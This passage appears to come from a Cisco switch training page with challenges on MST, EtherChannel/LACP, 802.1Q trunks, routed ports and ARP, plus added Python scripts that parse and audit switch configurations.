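PROMPT_RE = re.compile(r"^\s*\S*\(config(?:-mst)?\)#\s*")


def parse_mst_region(config_text):
    """Return (name, revision, {vlan: instance}) from a 'spanning-tree mst configuration'
    submode transcript. VLANs not mapped explicitly belong to instance 0 (the IST), as the
    show pending output on the page illustrates; abort discards the pending changes."""
    name, revision, mapping, in_block = "", 0, {}, False
    for raw in config_text.splitlines():
        line = PROMPT_RE.sub("", raw).strip()
        if line.startswith("spanning-tree mst configuration"):
            in_block = True
            continue
        if not in_block:
            continue
        if line == "abort":
            name, revision, mapping, in_block = "", 0, {}, False
            continue
        if line in ("exit", "end"):
            in_block = False
            continue
        m = re.match(r"instance\s+(\d+)\s+vlan\s+(.+)$", line)
        if m:
            for v in expand_vlan_list(m.group(2)):
                mapping[v] = int(m.group(1))
            continue
        m = re.match(r"name\s+(\S+)$", line)
        if m:
            name = m.group(1)
            continue
        m = re.match(r"revision\s+(\d+)$", line)
        if m:
            revision = int(m.group(1))
    full_map = {v: mapping.get(v, 0) for v in range(VLAN_MIN, VLAN_MAX + 1)}
    return name, revision, full_map


def region_mismatches(config_a, config_b):
    """Two switches form one MST region only if name, revision and the complete
    VLAN-to-instance table agree. Returns mismatch descriptions (empty = same region)."""
    name_a, rev_a, map_a = parse_mst_region(config_a)
    name_b, rev_b, map_b = parse_mst_region(config_b)
    problems = []
    if name_a != name_b:
        problems.append(f"name {name_a!r} != {name_b!r}")
    if rev_a != rev_b:
        problems.append(f"revision {rev_a} != {rev_b}")
    differing = [v for v in map_a if map_a[v] != map_b[v]]
    if differing:
        v = differing[0]
        problems.append(f"{len(differing)} VLAN(s) mapped differently, first is VLAN {v}: "
                        f"instance {map_a[v]} vs {map_b[v]}")
    return problems


# Constructed transcripts: SWITCH_A is the page's configuration, SWITCH_B differs by one VLAN.
SWITCH_A = """
Switch(config)# spanning-tree mst configuration
Switch(config-mst)# instance 1 vlan 10
Switch(config-mst)# name region1
Switch(config-mst)# revision 1
Switch(config-mst)# exit
"""
SWITCH_B = SWITCH_A.replace("instance 1 vlan 10", "instance 1 vlan 10-11")

if __name__ == "__main__":
    print("A vs A:", region_mismatches(SWITCH_A, SWITCH_A) or "same region")
    print("A vs B:", region_mismatches(SWITCH_A, SWITCH_B))
```

Run it against the saved configurations of every switch that is meant to be in region1; any non-empty result explains why show spanning-tree mst shows more than one region.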

Cisco Switch Challenge 52 (Primary root switch)


Area: Switches - RSTP and MSTP
Outline
This challenge involves configuring a primary root switch for a given MST instance, with a point-to-point link type for rapid transitions. root primary picks a bridge priority low enough to win the election (24576, or 4096 below the current root's priority if that is lower); the other global commands tune the timers that the root then advertises to the whole region.
Objectives
The objectives of this challenge are to:


Define a primary root.
Define MST parameters on the interface, such as cost and port-priority.
Define global MST parameters, such as hello time, forward-time, maximum age, maximum hops and priority.
Define a point-to-point link for rapid transitions.

The commands used are:


> enable
# config t
(config)# spanning-tree mst 1 root primary
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 priority 4096
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 16
(config-if)# spanning-tree link-type point-to-point

IOS accepts a bridge priority only as a multiple of 4096 (0 to 61440) and a port priority only as a multiple of 16 (0 to 240), so 4096 and 16 are used here; a value of 10 is refused for both. An explicit priority entered after root primary replaces the value root primary calculated, so use one or the other. The point-to-point link type is what allows the RSTP/MSTP proposal/agreement handshake; on a shared segment (half duplex or a hub) the port falls back to timer-based transitions.

Example
> enable
# config t
(config)# spanning-tree mst 1 root primary
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 priority 4096
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 16
(config-if)# spanning-tree ?
  bpdufilter     Don't send or receive BPDUs on this interface
  bpduguard      Don't accept BPDUs on this interface
  cost           Change an interface's spanning tree port path cost
  guard          Change an interface's spanning tree guard mode
  link-type      Specify a link type for spanning tree protocol use
  mst            Multiple spanning tree
  port-priority  Change an interface's spanning tree port priority
  portfast       Enable an interface to move directly to forwarding on link up
  stack-port     Enable stack port
  vlan           VLAN Switch Spanning Tree
(config-if)# spanning-tree link-type ?
  point-to-point  Consider the interface as point-to-point
  shared          Consider the interface as shared
(config-if)# spanning-tree link-type point-to-point

Cisco Switch Challenge 53


Outline
This challenge involves the configuration of an EtherChannel.

Objectives
The objectives of this challenge are to:

Define EtherChannel on ports.

Example
# config t
(config)# int fa0/1
(config-if)# channel-group ?
  <1-64>  Channel group number
(config-if)# channel-g 3 ?
  mode  Etherchannel Mode of the interface
(config-if)# channel-g 3 m ?
  active     Enable LACP unconditionally
  auto       Enable PAgP only if a PAgP device is detected
  desirable  Enable PAgP unconditionally
  on         Enable Etherchannel only
  passive    Enable LACP only if a LACP device is detected
(config-if)# channel-group 3 mode on
(config-if)# int fa0/2
(config-if)# channel-group 4 mode on

Ports that are to bundle into one EtherChannel must be given the same channel-group number; as entered here Fa0/1 and Fa0/2 become two separate single-member bundles, Port-channel 3 and Port-channel 4. Mode on forms the bundle without any negotiation, so a mismatch with the far end is not detected; LACP (mode active, next challenge) or PAgP (mode desirable) only bundles ports whose neighbour agrees.

Cisco Switch Challenge 54


Outline
This challenge involves configuring LACP (Link Aggregation Control Protocol, IEEE 802.3ad). LACP packets are exchanged over the member ports of the EtherChannel; the identity and port-group capabilities of the neighbour are learnt and compared with the local switch's capabilities. LACP assigns roles to the EtherChannel endpoints: the switch with the lowest system ID (system priority followed by MAC address) decides which ports actively participate in the EtherChannel, taking the ports with the lowest lacp port-priority values first.
Objectives
The objectives of this challenge are to:

Configure LACP (Link Aggregation Control Protocol).

The commands used are:

(config)# lacp system-priority 2
(config)# interface fa0/1
(config-if)# channel-protocol lacp
(config-if)# channel-group 1 mode active
(config-if)# lacp port-priority 1

Example
(config)# lacp ?
  system-priority  LACP priority for the system
(config)# lacp system-priority ?
  <1-65535>  Priority value
(config)# lacp system-priority 2
(config)# interface fa0/1
(config-if)# channel-protocol ?
  lacp  Prepare interface for LACP protocol
  pagp  Prepare interface for PAgP protocol
(config-if)# channel-protocol lacp
(config-if)# channel-group ?
  <1-6>  Channel group number
(config-if)# channel-group 1 ?
  mode  Etherchannel Mode of the interface
(config-if)# channel-group 1 mode ?
  active     Enable LACP unconditionally
  auto       Enable PAgP only if a PAgP device is detected
  desirable  Enable PAgP unconditionally
  on         Enable Etherchannel only
  passive    Enable LACP only if a LACP device is detected
(config-if)# channel-group 1 mode active
(config-if)# lacp ?
  port-priority  LACP priority on this interface
(config-if)# lacp port-priority ?
  <1-65535>  Priority value
(config-if)# lacp port-priority 1
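The mode pairings of Challenge 53 and the LACP election rules of Challenge 54 are easy to get wrong from memory, so here they are as code. This Python script is an added example and not part of the NetworkSims page: channel_forms() says whether a bundle forms for a pair of channel-group modes and by which protocol, lacp_decision_maker() applies the system-ID rule (system priority, then MAC, lower wins), and lacp_active_ports() picks the active members by port priority. The maximum of eight active links per bundle and the default port priority of 32768 are Catalyst defaults assumed for the example; the neighbour switch and port list are constructed.

```python
LACP_MODES = frozenset({"active", "passive"})
PAGP_MODES = frozenset({"desirable", "auto"})


def channel_forms(mode_a, mode_b):
    """Result of pairing the channel-group modes of the two ends of a link:
    'static' (mode on, no negotiation), 'lacp', 'pagp', or None if no bundle forms.
    Both 'passive' and both 'auto' never bundle, because each side waits for the other,
    and a protocol mode never bundles with 'on' or with the other protocol."""
    a, b = mode_a.lower(), mode_b.lower()
    if a == "on" and b == "on":
        return "static"
    if {a, b} <= LACP_MODES and "active" in (a, b):
        return "lacp"
    if {a, b} <= PAGP_MODES and "desirable" in (a, b):
        return "pagp"
    return None


def lacp_system_id(system_priority, mac):
    """LACP system ID = 16-bit system priority followed by the 48-bit MAC; numerically
    lower wins. Accepts IOS dotted (0000.0c07.ac01) or colon notation."""
    if not 1 <= system_priority <= 65535:
        raise ValueError("lacp system-priority is 1-65535")
    return (system_priority, int(mac.replace(".", "").replace(":", ""), 16))


def lacp_decision_maker(end_a, end_b):
    """end = (name, system_priority, mac). Returns the name of the switch that decides
    which ports aggregate: the one with the lowest system ID."""
    return min((end_a, end_b), key=lambda e: lacp_system_id(e[1], e[2]))[0]


def lacp_active_ports(ports, max_active=8):
    """ports = [(port_name, lacp_port_priority, port_number)]. A Catalyst bundles at most
    eight active links (assumed platform limit); the lowest (port priority, port number)
    pairs are chosen and the remainder stand by. Returns (active, standby)."""
    ranked = sorted(ports, key=lambda p: (p[1], p[2]))
    return [p[0] for p in ranked[:max_active]], [p[0] for p in ranked[max_active:]]


if __name__ == "__main__":
    for pair in (("on", "on"), ("active", "passive"), ("passive", "passive"),
                 ("desirable", "auto"), ("active", "desirable"), ("on", "active")):
        print(pair, "->", channel_forms(*pair))
    # Constructed: the page's switch (system-priority 2) against a neighbour at the default 32768.
    print(lacp_decision_maker(("sw1", 2, "0000.0c00.0001"), ("sw2", 32768, "0000.0c00.0002")))
    ports = [(f"fa0/{n}", 32768, n) for n in range(1, 11)] + [("fa0/11", 1, 11)]
    print(lacp_active_ports(ports))
```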

Cisco Switch Test 3 (Challenge 55)


Unit 3: STP
The most up-to-date version of this test is at:
http://networksims.com/sw03.html

Cisco Switch Challenge 56


Area: Switches - Defining trunk ports

Outline
IEEE 802.1Q (dot1q) trunk encapsulation tags each frame with its VLAN, so one trunk link can carry several VLANs between switches. Ports that face end hosts are set to access mode explicitly so that they never negotiate a trunk.
Objectives
The objectives of this challenge are to:

Define normal switch port.


Define a trunk port.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Example
> enable
# config t
(config)# int fa0/1
(config-if)# sw ?
  access         Set access mode characteristics of the interface
  block          Disable forwarding of unknown uni/multi cast addresses
  broadcast      Set broadcast suppression level on this interface
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  host           Set port host
  mode           Set trunking mode of the interface
  multicast      Set multicast suppression level on this interface
  native         Set trunking native characteristics when interface is in trunking mode
  nonegotiate    Device will not engage in negotiation protocol on this interface
  port-security  Security related command
  priority       Set appliance 802.1p priority
  protected      Configure an interface to be a protected port
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
  trunk          Set trunking characteristics of the interface
  unicast        Set unicast suppression level on this interface
  voice          Voice appliance attributes
  <cr>
(config-if)# sw mo ?
  access        Set trunking mode to ACCESS unconditionally
  dot1q-tunnel  Set trunking mode to DOT1Q TUNNEL unconditionally
  dynamic       Set trunking mode to dynamically negotiate access or trunk mode
  trunk         Set trunking mode to TRUNK unconditionally
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# sw t ?
  allowed        Set allowed VLAN characteristics when interface is in trunking mode
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  native         Set trunking native characteristics when interface is in trunking mode
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Note that switchport trunk has no mode keyword, as the sw t ? output shows: the encapsulation is chosen with switchport trunk encapsulation dot1q and the port is then made a trunk with switchport mode trunk. The dynamic mode leaves the decision to DTP negotiation with whatever is plugged in, so on a port that is meant to stay a trunk add switchport nonegotiate as well, and keep host-facing ports in access mode as above.

Cisco Switch Challenge 57


Area: Switches - Defining trunk ports
Outline
IEEE 802.1Q (dot1q) trunk encapsulation allows a trunk link to interconnect VLANs on different switches. This challenge also sets the access VLAN and the native (untagged) VLAN of the trunk port.
Objectives
The objectives of this challenge are to:

Define normal switch ports.
Define a trunk port.
Define the access VLAN and the native VLAN of the trunk port.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport access vlan 5
(config-if)# switchport trunk native vlan 6

Example
> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport access ?
  vlan  Set VLAN when interface is in access mode
(config-if)# switchport access vlan ?
  <1-4094>  VLAN ID of the VLAN when this port is in access mode
  dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if)# switchport access vlan 5
(config-if)# switchport trunk ?
  allowed        Set allowed VLAN characteristics when interface is in trunking mode
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  native         Set trunking native characteristics when interface is in trunking mode
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
(config-if)# switchport trunk native ?
  vlan  Set native VLAN when interface is in trunking mode
(config-if)# switchport trunk native vlan ?
  <1-4094>  VLAN ID of the native VLAN when this port is in trunking mode
(config-if)# switchport trunk native vlan 6

In this example switchport access vlan 5 does not stop VLAN 5 crossing the trunk: the access VLAN only applies if Fa0/6 stops trunking and falls back to access mode, and while the port is a trunk it has no effect. The native VLAN is set to VLAN 6, which is the VLAN whose frames are sent untagged on the trunk. Leaving the native VLAN at its default of 1 while VLAN 1 is also used on access ports is what makes double-tagged VLAN hopping possible, so move it to an unused VLAN as done here. To keep a VLAN off a trunk use switchport trunk allowed vlan remove, as in the next challenge.

Cisco Switch Challenge 58


Area: Switches - Defining trunk ports
Outline
IEEE 802.1Q (dot1q) trunk encapsulation allows a trunk link to interconnect VLANs on different switches. This challenge removes VLANs from the list the trunk is allowed to carry.
Objectives
The objectives of this challenge are to:

Define normal switch ports.
Define a trunk port.
Remove VLANs from the trunk.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit

(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport trunk allowed vlan remove 2
(config-if)# switchport trunk allowed vlan remove 3

Example
> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport t ?
  allowed        Set allowed VLAN characteristics when interface is in trunking mode
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  native         Set trunking native characteristics when interface is in trunking mode
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
(config-if)# switchport t a ?
  vlan  Set allowed VLANs when interface is in trunking mode
(config-if)# switchport t a v ?
  WORD    VLAN IDs of the allowed VLANs when this port is in trunking mode
  add     add VLANs to the current list
  all     all VLANs
  except  all VLANs except the following
  none    no VLANs
  remove  remove VLANs from the current list
(config-if)# switchport trunk allowed vlan remove ?
  WORD  VLAN IDs of disallowed VLANS when this port is in trunking mode
(config-if)# switchport trunk allowed vlan remove 2
(config-if)# switchport trunk allowed vlan remove 3

By default a trunk carries every VLAN (1 to 4094). The add, remove and except forms edit the current list, while a bare VLAN list replaces it, so switchport trunk allowed vlan 10,20 and switchport trunk allowed vlan add 10,20 do different things. Restricting the list to the VLANs the far switch actually needs is the usual hardening step for a trunk.


Cisco Switch Challenge 59


Area: Switches - Defining trunk ports
Outline
IEEE 802.1Q (dot1q) trunk encapsulation allows a trunk link to interconnect VLANs on different switches. This challenge removes a VLAN from the trunk's VTP pruning-eligible list, so that VLAN's flooded traffic is always sent over the trunk whether or not the far switch has active ports in it.
Objectives
The objectives of this challenge are to:

Define normal switch ports.
Define a trunk port.
Remove a VLAN from pruning.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport trunk pruning vlan remove 10

Example
> enable
# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport mode access
(config-if)# exit

(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport t ?
  allowed        Set allowed VLAN characteristics when interface is in trunking mode
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  native         Set trunking native characteristics when interface is in trunking mode
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
(config-if)# sw t p ?
  vlan  Set VLANs enabled for pruning when interface is in trunking mode
(config-if)# sw t p v ?
  WORD    VLAN IDs of the allowed VLANs when this port is in trunking mode
  add     add VLANs to the current list
  except  all VLANs except the following
  none    no VLANs
  remove  remove VLANs from the current list
(config-if)# sw t p v r ?
  WORD  VLAN IDs of disallowed VLANS when this port is in trunking mode
(config-if)# switchport trunk pruning vlan remove 10

By default VLANs 2 to 1001 are pruning-eligible; VLAN 1 and VLANs 1002 to 4094 are never pruned. Pruning only takes effect once vtp pruning has been enabled on the VTP server of the domain.
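Challenges 56 to 59 each change one attribute of a trunk port, and the effective state of the port is the result of all of them applied in order. The following Python script is an added example, not part of the NetworkSims page: it parses the int / switchport lines of those challenges into per-port state, implements the add / remove / except / all / none / bare-list semantics of switchport trunk allowed vlan and switchport trunk pruning vlan, and then audits each port for the points raised above (DTP still negotiating, native VLAN left at 1, every VLAN allowed). The defaults used (all VLANs allowed, VLANs 2 to 1001 pruning-eligible, native VLAN 1) are the IOS defaults; the sample configuration and the extra port fa0/7 are constructed for the example.

```python
import re

ALL_VLANS = frozenset(range(1, 4095))
PRUNE_ELIGIBLE = frozenset(range(2, 1002))   # VLAN 1 and 1002-4094 are never pruned


def expand(spec):
    """'2,10-12' -> {2, 10, 11, 12}; rejects anything outside 1-4094."""
    out = set()
    for part in spec.replace(" ", "").split(","):
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        if not 1 <= lo <= hi <= 4094:
            raise ValueError(f"VLAN range out of bounds: {part}")
        out.update(range(lo, hi + 1))
    return out


def apply_vlan_list(current, words, universe):
    """Apply the operand of 'switchport trunk {allowed|pruning} vlan ...' to a set.
    add/remove/except edit relative to the current list; a bare list replaces it."""
    op, rest = words[0].lower(), ",".join(words[1:])
    if op == "all":
        return set(universe)
    if op == "none":
        return set()
    if op == "add":
        return current | (expand(rest) & universe)
    if op == "remove":
        return current - expand(rest)
    if op == "except":
        return set(universe) - expand(rest)
    return expand(op) & universe


def new_port(name):
    return {"name": name, "mode": None, "native": 1, "access_vlan": 1, "nonegotiate": False,
            "allowed": set(ALL_VLANS), "pruning": set(PRUNE_ELIGIBLE)}


PROMPT_RE = re.compile(r"^\s*(?:\S*\(config(?:-if)?\)#)?\s*")


def parse_ports(config_text):
    """Build a per-port state table from IOS-style 'int' / 'switchport' lines."""
    ports, cur = {}, None
    for raw in config_text.splitlines():
        words = PROMPT_RE.sub("", raw).split()
        if not words:
            continue
        if words[0] in ("int", "interface") and len(words) > 1:
            cur = ports.setdefault(words[1].lower(), new_port(words[1].lower()))
        elif cur is not None and words[0] == "switchport" and len(words) > 1:
            sub = words[1:]
            if sub[:1] == ["mode"] and len(sub) > 1:
                cur["mode"] = sub[1]            # access, trunk, dynamic or dot1q-tunnel
            elif sub[:1] == ["nonegotiate"]:
                cur["nonegotiate"] = True
            elif sub[:2] == ["access", "vlan"] and len(sub) > 2 and sub[2].isdigit():
                cur["access_vlan"] = int(sub[2])
            elif sub[:3] == ["trunk", "native", "vlan"] and len(sub) > 3:
                cur["native"] = int(sub[3])
            elif sub[:3] == ["trunk", "allowed", "vlan"] and len(sub) > 3:
                cur["allowed"] = apply_vlan_list(cur["allowed"], sub[3:], ALL_VLANS)
            elif sub[:3] == ["trunk", "pruning", "vlan"] and len(sub) > 3:
                cur["pruning"] = apply_vlan_list(cur["pruning"], sub[3:], PRUNE_ELIGIBLE)
    return ports


def audit(port):
    """Findings a reviewer would raise for one port, in terms of the commands above."""
    findings = []
    if port["mode"] in (None, "dynamic"):
        findings.append("trunking is negotiated by DTP; set switchport mode access or trunk explicitly")
    if port["mode"] == "trunk":
        if not port["nonegotiate"]:
            findings.append("DTP still runs on this trunk; add switchport nonegotiate")
        if port["native"] == 1:
            findings.append("native VLAN left at the default (1); move it to an unused VLAN")
        if port["allowed"] == ALL_VLANS:
            findings.append("all VLANs allowed; restrict with switchport trunk allowed vlan")
    return findings


# Constructed sample: Challenge 58's ports plus one port left to negotiate (fa0/7).
SAMPLE_CONFIG = """
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# switchport trunk allowed vlan remove 2
(config-if)# switchport trunk allowed vlan remove 3
(config-if)# switchport trunk pruning vlan remove 10
(config)# int fa0/7
(config-if)# switchport mode dynamic desirable
"""

if __name__ == "__main__":
    for name, port in parse_ports(SAMPLE_CONFIG).items():
        print(name, port["mode"], "allowed:", len(port["allowed"]), audit(port))
```

The parser accepts both the prompted transcript style used on this page and plain running-config lines, so the same audit can be run over show running-config output.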

Cisco Switch Test 4 (Challenge 60)


Unit 4: InterVLAN
The most up-to-date version of this test is at:
http://networksims.com/sw04.html

Cisco Switch Challenge 61


Area: Switches - IP Unicast Routing
Outline
This challenge involves configuring a port (Fa0/1) as a routed Layer 3 interface.

Objectives
The objectives of this challenge are to:

Define Layer 3 operation on Fa0/1 (no switchport).
Define an IP address for Fa0/1.
Enable classless forwarding (ip classless).
Allow the zero subnet (ip subnet-zero).

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip address 1.2.3.4 255.255.0.0
(config-if)# no shutdown
(config-if)# exit
(config)# ip subnet-zero
(config)# ip classless

Example
> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip address ?
A.B.C.D IP address
(config-if)# ip address 1.2.3.4 ?
A.B.C.D IP subnet mask
(config-if)# ip address 1.2.3.4 255.255.0.0
(config-if)# no shutdown
(config-if)# exit
(config)# ip ?
Global IP configuration subcommands:
  access-list           Named access-list
  accounting-list       Select hosts for which IP accounting information is kept
  accounting-threshold  Sets the maximum number of accounting entries
  accounting-transits   Sets the maximum number of transit entries
  alias                 Alias an IP address to a TCP port
  as-path               BGP autonomous system path filter
  bgp-community         format for BGP community
  cef                   Cisco Express Forwarding
  classless             Follow classless routing forwarding rules
  community-list        Add a community list entry
  default-gateway       Specify default gateway (if not routing IP)
  default-network       Flags networks as candidates for default routes
  dhcp                  Configure DHCP server, relay and snooping parameters
  dhcp-server           Specify address of DHCP server to use
  domain-list           Domain name to complete unqualified host names.
  domain-lookup         Enable IP Domain Name System hostname translation
  domain-name           Define the default domain name
  dvmrp                 DVMRP global commands
  extcommunity-list     Add a extended community list entry
  finger                finger server
  flow-aggregation      Configure flow aggregation
  flow-cache            Configure netflow cache parameters
  flow-export           Specify host/port to send flow statistics
  forward-protocol      Controls forwarding of physical and directed IP broadcasts
  ftp                   FTP configuration commands
  gdp                   Router discovery mechanism
  gratuitous-arps       Generate gratuitous ARPs for PPP/SLIP peer addresses
  host                  Add an entry to the ip hostname table
  host-routing          Enable host-based routing (proxy ARP and redirect)
  hp-host               Enable the HP proxy probe service
  http                  HTTP server configuration
  icmp                  ICMP options
  igmp                  IGMP global configuration
  local                 Specify local options
  mrm                   Configure IP Multicast Routing Monitor test parameters
  mroute                Configure static multicast routes
  msdp                  MSDP global commands
  multicast             Global IP Multicast Commands
  multicast-routing     Enable IP multicast forwarding
  name-server           Specify address of name server to use
  ospf                  OSPF
  pim                   PIM global commands
  prefix-list           Build a prefix list
  radius                RADIUS configuration commands
  rcmd                  Rcmd commands
  reflexive-list        Reflexive access list
  route                 Establish static routes
  routing               Enable IP routing
  sap                   Global IP Multicast SAP Commands
  sdr                   Global IP Multicast SDR Commands
  security              Specify system wide security information
  source-route          Process packets with source routing header options
  sticky-arp            Allow the creation of sticky ARP entries
  subnet-zero           Allow 'subnet zero' subnets
  tacacs                TACACS configuration commands
  tcp                   Global TCP parameters
  telnet                Specify telnet options
  tftp                  tftp configuration commands
  vrf                   Configure an IP VPN Routing/Forwarding instance
  wccp                  Web-Cache Coordination Protocol Commands
(config)# ip subnet-zero
(config)# ip classless

Both ip subnet-zero and ip classless are on by default in IOS 12.0 and later, so on a current image these two commands change nothing; they are kept here because older images needed them.

Cisco Switch Challenge 62


Area: Switches - IP Unicast Routing
Outline
This challenge involves configuring a static ARP entry, the ARP cache timeout and proxy ARP. Proxy ARP is enabled by default on IOS interfaces and lets the switch answer ARP requests on behalf of hosts on other subnets, so turn it off (no ip proxy-arp) where nothing relies on it. The 10-second timeout used below is for the exercise only; the default is 14400 seconds.
Objectives

The objectives of this challenge are to:

Define the default gateway (if routing is not enabled).
Define a static ARP entry.
Define the ARP timeout.

The commands used are:


> enable
# config t
(config)# ip default-gateway 1.2.3.4
(config)# arp 1.2.3.4 1.1.1
(config)# int fa0/1
(config-if)# arp timeout 10
(config-if)# ip proxy-arp
(config-if)# arp arpa

Example
> enable
# config t
(config)# ip default-gateway ?
  A.B.C.D  IP address of default gateway
(config)# ip default-gateway 1.2.3.4
(config)# arp ?
  A.B.C.D  IP address of ARP entry
  vrf      Configure static ARP for a VPN Routing/Forwarding instance
(config)# arp 1.2.3.4 ?
  H.H.H  48-bit hardware address of ARP entry
(config)# arp 1.2.3.4 1.1.1 ?
  arpa   ARP type ARPA
  sap    ARP type SAP (HP's ARP type)
  smds   ARP type SMDS
  snap   ARP type SNAP (FDDI and TokenRing)
  srp-a  ARP type SRP (side A)
  srp-b  ARP type SRP (side B)
(config)# arp 1.2.3.4 1.1.1
(config)# int fa0/1
(config-if)# arp ?
  arpa         Standard arp protocol
  frame-relay  Enable ARP for a frame relay interface
  probe        HP style arp protocol
  snap         IEEE 802.3 style arp
  timeout      Set ARP cache timeout
(config-if)# arp arpa
(config-if)# arp t ?
  <0-2147483>  Seconds
(config-if)# arp timeout 10
(config-if)# ip ?
Interface IP configuration subcommands:
  access-group        Specify access control for packets
  accounting          Enable IP accounting on this interface
  address             Set the IP address of an interface
  authentication      authentication subcommands
  bandwidth-percent   Set EIGRP bandwidth limit
  bgp                 BGP interface commands
  broadcast-address   Set the broadcast address of an interface
  cef                 Cisco Express Forwarding interface commands
  cgmp                Enable/disable CGMP
  dhcp                Configure DHCP parameters for this interface
  directed-broadcast  Enable forwarding of directed broadcasts
  dvmrp               DVMRP interface commands
  hello-interval      Configures IP-EIGRP hello interval
  helper-address      Specify a destination address for UDP broadcasts
  hold-time           Configures IP-EIGRP hold time
  igmp                IGMP interface commands
  irdp                ICMP Router Discovery Protocol
  load-sharing        Style of load sharing
  local-proxy-arp     Enable local-proxy ARP
  mask-reply          Enable sending ICMP Mask Reply messages
  mrm                 Configure IP Multicast Routing Monitor tester
  mroute-cache        Enable switching cache for incoming multicast packets
  mtu                 Set IP Maximum Transmission Unit
  multicast           IP multicast interface commands
  ospf                OSPF interface commands
  pim                 PIM interface commands
  policy              Enable policy routing
  probe               Enable HP Probe support
  proxy-arp           Enable proxy ARP
  rarp-server         Enable RARP server for static arp entries
  redirects           Enable sending ICMP Redirect messages
  rgmp                Enable/disable RGMP
  rip                 Router Information Protocol
  route-cache         Enable fast-switching cache for outgoing packets
  sap                 Session Advertisement Protocol interface commands
  sdr                 Session Directory Protocol interface commands
  security            DDN IP Security Option
  split-horizon       Perform split horizon
  summary-address     Perform address summarization
  unnumbered          Enable IP processing without an explicit address
  unreachables        Enable sending ICMP Unreachable messages
  urd                 Configure URL Rendezvousing
  vrf                 VPN Routing/Forwarding parameters on the interface
  wccp                WCCP interface commands
(config-if)# ip proxy-arp
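A static ARP entry such as arp 1.2.3.4 1.1.1 pins the binding the switch itself uses, but it does not stop other hosts on the segment from being told something else. The following Python script is an added example and not part of the NetworkSims page: it converts the dotted H.H.H notation IOS uses into the usual colon form, collects the static entries from config lines like the one above, and then checks a list of ARP replies seen on the wire against them, reporting replies that contradict a static entry and IPs claimed by more than one MAC. The observed replies are constructed for the example; on a real network they would come from a capture.

```python
import re
from collections import defaultdict


def cisco_mac_to_canonical(hhh):
    """IOS writes MAC addresses as three dotted 16-bit groups (H.H.H); '1.1.1' is the
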